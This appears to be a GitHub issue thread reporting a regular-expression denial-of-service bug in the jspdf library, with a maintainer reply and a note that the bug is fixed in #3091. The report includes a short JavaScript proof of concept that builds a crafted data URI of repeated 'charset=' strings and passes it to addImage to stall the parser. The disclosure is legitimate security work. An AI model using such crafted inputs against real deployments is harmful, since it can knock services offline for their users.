ReDoS in jspdf

[yetingli]

Hi,

I would like to report a Regular Expression Denial of Service (REDoS) vulnerability in jspdf.

It allows cause a denial of service when adding images.

You can execute the code below to reproduce the vulnerability.

const fs = require("fs");
const { jsPDF } = require("jspdf")


function build_blank(n) {
var ret = "data:/"
for (var i = 0; i < n; i++) {
ret += "charset="
}
return ret + "!";
}
 
const doc = new jsPDF();
doc.text("Hello world1111!", 10, 10);

var imageData = "data:image/png;base64,"

var Octocat = fs.readFileSync("psb.png", { encoding: "latin1" });
doc.addImage(build_blank(30) + imageData, "test", 10, 40, 180, 180, undefined, "SLOW");


doc.save("a4ffff.pdf"); // will save the file in the current working directory
console.log("type:" + typeof(doc.addImage))​

Best,
Yeting Li

[HackbrettXXX]

Thanks for the issue report. I think we need to fix this regexp. Could you prepare a PR?

[yetingli]

Thanks for the issue report. I think we need to fix this regexp. Could you prepare a PR?

Thank you for your reply, I'd be happy to oblige.

[HackbrettXXX]

Fixed in #3091.